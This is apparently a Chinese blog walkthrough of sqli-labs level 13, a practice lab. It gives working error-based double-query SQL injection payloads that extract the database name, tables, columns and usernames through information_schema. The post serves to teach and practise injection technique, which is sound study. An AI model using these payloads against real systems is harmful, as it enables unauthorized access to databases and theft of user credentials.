时间:2021-07-01 10:21:17 帮助过:16人阅读
0X02爆库名
‘) union select null,database()#
哦豁 回显信息 那我们只有通过报错来进行注入了
按我们前面学习的双注入来
1‘) union select count(*),concat_ws(‘:‘,(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a#
成功
OX03爆表名
‘) union select count(*),concat_ws(‘++‘,(select table_name from information_schema.tables where table_schema=‘security‘),floor(rand()*2)) as a from information_schema.tables group by a#
有事这个错误 limit一个一个的看吧 唉
‘) union select count(*),concat_ws(‘++‘,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
0X04爆列名
‘) union select count(*),concat_ws(‘+‘,(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
0X05爱之深入了解 爆字段
‘) union select count(*),concat_ws(‘;‘,(select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#
这里我是一个字段一个字段的爆破的 .
sqli-lab(13)
标签:用户名 div 登录失败 错误 cat style info injection 语句